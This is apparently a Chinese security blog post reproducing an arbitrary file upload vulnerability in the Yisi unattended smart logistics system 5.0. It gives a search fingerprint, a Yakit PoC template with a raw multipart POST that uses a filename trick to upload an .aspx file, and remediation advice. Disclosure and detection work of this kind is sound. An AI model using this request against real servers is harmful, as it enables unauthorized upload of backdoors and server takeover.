-
【漏洞复现】易思智能物流无人值守系统文件上传
本文由掌控安全学院 - 江月 投稿【产品介绍】
易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇。
【漏洞描述】
易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
【影响范围】
易思智能物流无人值守系统5.0
【指纹】
web.body=”智能物流无人值守系统”
【Poc检测】
【验证】
【Yakit Poc自动化验证】
id: Yisi-upload info: name: Yisi-upload author: hack severity: info description: description reference: - https:// tags: tags requests: - raw: - | POST /Sys_ReportFile/ImportReport?encode=hack HTTP/1.1 Host: {{Hostname}} X-File-Name: test.grf User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 207 ------WebKitFormBoundaryxzUhGld6cusN3Alk Content-Disposition: form-data; name="file"; .filename="test.grf;.aspx" Content-Type: application/octet-stream test ------WebKitFormBoundaryxzUhGld6cusN3Alk-- matchers-condition: and matchers: - type: word part: body words: - Custom - type: status status: - 200- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
【修复建议】
对上传文件的类型、大小、文件名等进行验证,确保只允许上传合法的文件类型,并限制文件大小和文件名的长度。可以使用白名单或黑名单的方式进行验证。
及时关注和应用厂商发布的安全补丁和更新,修复已知的文件上传漏洞。
> 没看够?欢迎关注
-
相关阅读:
动态规划之-----年终奖
贪心算法 Problem D 1003 哈夫曼编码
NR modulation 1
QT 使用C++线程池运行Lambda自定义函数
重庆大学c++、2022级-第5次实验-运用STL的容器和算法编写程序
使用awk聚合和排序
什么是MIMO?
Linux查询命令合集
〖Python 数据库开发实战 - MySQL篇㉗〗- MySQL 数字函数
【Java】springboot 页面不显示 throw 的错误提示信息
- 原文地址:https://blog.csdn.net/hackzkaq/article/details/133172821
